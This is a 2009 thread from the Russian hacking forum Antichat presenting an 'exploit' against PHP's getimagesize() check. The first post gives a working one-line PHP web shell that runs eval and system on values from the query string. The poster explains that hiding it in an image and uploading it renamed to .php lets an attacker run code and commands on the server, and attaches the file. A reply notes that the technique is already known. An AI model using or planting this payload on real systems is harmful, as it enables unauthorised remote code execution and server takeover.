Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript Эксплойт getimagesize()

   

Опции темы

Поиск в этой теме

Опции просмотра

Эксплойт getimagesize()   #1   25.03.2009, 14:31 -Hormold- Постоянный Регистрация: 29.09.2007 Сообщений: 617 Провел на форуме: 3250478 Репутация: 999 Эксплойт getimagesize() Сделал интересную "картинку", обходящую функцию getimagesize(). В чём идея? В том, что этой ф-ции чихать на расширение файла - она проверяет только тип и размер картинки, следовательно, можно загрузить картинку переименованную в php и функция не выругается. При том, что "картинка" выглядит очень похоже на нормальную картинку - это не мешает ей содержать PHP код: <? eval(stripslashes($_GET['c'])); system($_GET['s']); ?> Загружаем переименованную в php эту картинку и выполняем свой код и команды на сервере. Если не открыть картинку блокнотом - выглядит очень правдоподобно. Баг найден Eugen'ом с tem.dp.ua Вложения hack.rar (503 байт, 26 просмотров)   -Hormold- Посмотреть профиль Репутация Отправить личное сообщение для -Hormold- Посетить домашнюю страницу -Hormold- Найти все сообщения от -Hormold- Добавить в друзья   #2   25.03.2009, 14:50 D Mak Участник форума Регистрация: 23.06.2007 Сообщений: 188 Провел на форуме: 1051973 Репутация: 116 вродь как баян уже http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/   D Mak Посмотреть профиль Репутация Отправить личное сообщение для D Mak Найти все сообщения от D Mak Добавить в друзья

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Помогите запустить эксплойт	oficer	Болталка	20	13.02.2009 21:17
В Сети появился эксплойт к критической уязвимости Windows	[2-D]	Мировые новости	3	20.01.2007 14:44
эксплойт для модема D-link 500t	Qpet	Защита ОС: вирусы, антивирусы, файрволы.	5	31.08.2006 11:41
В Сети появился новый эксплойт к уязвимости в ОС Windows	dinar_007	Мировые новости	0	16.08.2006 22:27
В Сети может появиться опасный эксплойт для Windows	DRON-ANARCHY	Мировые новости	2	04.12.2005 19:37

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход Мой кабинет Личные сообщения Подписки Кто на форуме Поиск по форуму Главная страница форума ИНФО     Мировые новости     Статьи         Авторские статьи         Чужие Статьи Безопасность и Уязвимости     Избранное     Уязвимости         Сценарии/CMF/СMS         Форумы         Расшифровка хешей         E-Mail         ICQ         Чаты     Безопасность         *nix         Soft - *nix         Windows         Soft - Windows         Анонимность         АнтиАдмин         Защита ОС: вирусы, антивирусы, файрволы.     Электроника и Фрикинг         Новости мира "железа"         Сотовый фрикинг         Аппаратное обеспечение         Схемы и программы         Телефония и связь         Беспроводные технологии/WPAN/WLAN     Администрирование         *nix системы         Windows системы         AntiDDos - АнтиДДОС     Проверка на уязвимости Программирование     PHP, PERL, MySQL, JavaScript         ПО для Web разработчика     С/С++, C#, Delphi, .NET, Asm     Реверсинг SЕО/Финансовые задачи/Социальные сети     SЕО - тонкости, методы раскрутки         Партнерки         Услуги, Покупка и Продажа в SEO         Платежные системы: Webmoney, Yandex Деньги, РБК Деньги и т. д.         Белые методы раскрутки         Черные методы раскрутки         Обсуждение Ваших сайтов         Статьи     Покупка, Продажа, Обмен         Разное - Покупка, продажа, обмен         VPN, Proxy, Socks - Покупка, продажа         Хостинг, Dedicated, VDS, Сервера - Покупка, продажа         Инвайты, mails, базы - Покупка, продажа         Доступы, shells, ftp - Покупка, продажа         Мобильная связь, СМС - Покупка, продажа         Трафик, лоады, инсталлы, загрузки - Покупка, продажа         О Работе         Покупка, продажа, услуги в Соц. Сетях         ICQ - Покупка, продажа     Социальные сети         Покупка, продажа, услуги в Соц. Сетях     Хостинги - Hostings Оффтоп     Болталка     Forum for discussion of ANTICHAT     Квесты         Antichat's Quest Antichat     Правила форума     Новости форума     Video.Antichat         Комментарии к видео